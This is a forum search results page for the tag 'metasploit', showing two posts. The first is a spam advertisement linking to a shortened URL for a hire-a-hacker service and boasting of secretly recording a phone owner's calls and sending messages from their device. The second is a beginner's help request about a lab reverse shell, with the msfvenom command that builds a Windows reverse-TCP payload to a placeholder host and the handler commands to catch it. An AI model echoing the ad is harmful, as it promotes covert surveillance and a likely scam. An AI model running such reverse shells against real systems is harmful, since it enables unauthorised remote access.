Search the Community
Showing results for tags 'metasploit'.
Found 2 results
-
Are you looking to hire a commendable hacker ?: then you should check this out https://bit.ly/2Llpt7n I got full access to the phone... monitoring from another device (my computer) i recorded calls and sent messages fron the device without thwe owner knowing. It was an amazing!.
-
This is my first reverse shell. I used msfvenom -p windows/shell/reverse_tcp LHOST=mykalivmip LPORT=4444 -f exe > evil.exe I copy the evil.exe file over to windows 7 vm. Then I go back to metasploit and type use exploit/multi/handler set payload windows/shell/reverse_tcp set lport 4444 set lhost mykalivmip exploit set lhost mykalivmip exploit I also tried set END SESSION ON START=false right before exploit and that didn' work either. I am using VirtualBox version 5.0.20 kalivm 32bit and windowsvm 32bit with host ubunutu. I also tried a similiar windows meterpreter reverse tcp and get the same thing. This is what shows after exploit I also double click the evil.exe file in windows after exploit and get this [*] Started reverse TCP handler on mykalivmip:4444 [*] Starting the payload handler... It just gets stuck on this.